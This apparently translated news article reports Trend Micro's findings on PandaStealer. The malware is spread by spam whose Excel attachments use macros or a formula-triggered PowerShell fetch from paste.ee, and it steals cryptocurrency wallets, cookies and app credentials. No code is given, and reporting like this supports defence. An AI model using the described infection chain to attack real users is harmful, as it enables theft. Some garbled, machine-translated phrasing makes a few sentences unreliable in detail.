Trend Micro researchers have discovered a new variant of the cryptocurrency thief that uses a fileless approach in its global spam distribution campaign to evade detection. Dubbed PandaStealer, Trend Micro researchers said this week that the malware has been found targeting people in countries like the US, Australia, Japan and Germany.
Spam emails pose as commercial quote requests to entice victims to click booby-trapped Excel files. Researchers found 264 files similar to Panda Stealer on VirusTotal, and some of them were shared by threat actors on Discord. That’s not surprising, given recent trends: Cisco’s Talos cybersecurity team recently found that threat actors have infiltrated workflow and collaboration tools like Slack and Discord to bypass security and deliver thieves. information, Remote Access Trojans (RAT) and other malware.
Trend Micro identified two chains of infection. One uses an .XLSM attachment that contains macros that unload a loader, which is then downloaded and executed by the main thief. The second infection string method involves an attached .XLS file that contains an Excel formula that uses a PowerShell command to access paste.ee, an alternative to Pastebin, which accesses a second encrypted PowerShell command.
PandaStealer has an infection chain that uses the same fileless distribution method as the “Regular” variant of the Phobos ransomware to carry out memory-based attacks, making it difficult to detect for security tools.
Once downloaded, Panda Stealer will try to detect keys and addresses associated with cryptocurrency wallets containing funds, including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN), and Dash (DASH). Additionally, the malware can take screenshots, leak system data, and steal information, including browser cookies and credentials for NordVPN, Telegram, Discord, and Steam accounts.
While the campaign has not been attributed to specific cyber attackers, Trend Micro says that an examination of the malware’s active command and control (C2) servers led the team to IP addresses and a virtual private server (VPS) rented from Shock Hosting. Since then, the server has been suspended.
See also:
Cryptocurrencies security is a growing problem
Babuk Locker – The First Ransomware of 2021
[…] also:PandaStealer, the new threat to cryptocurrenciesThe Dangers of Cryptojacking and how it affects […]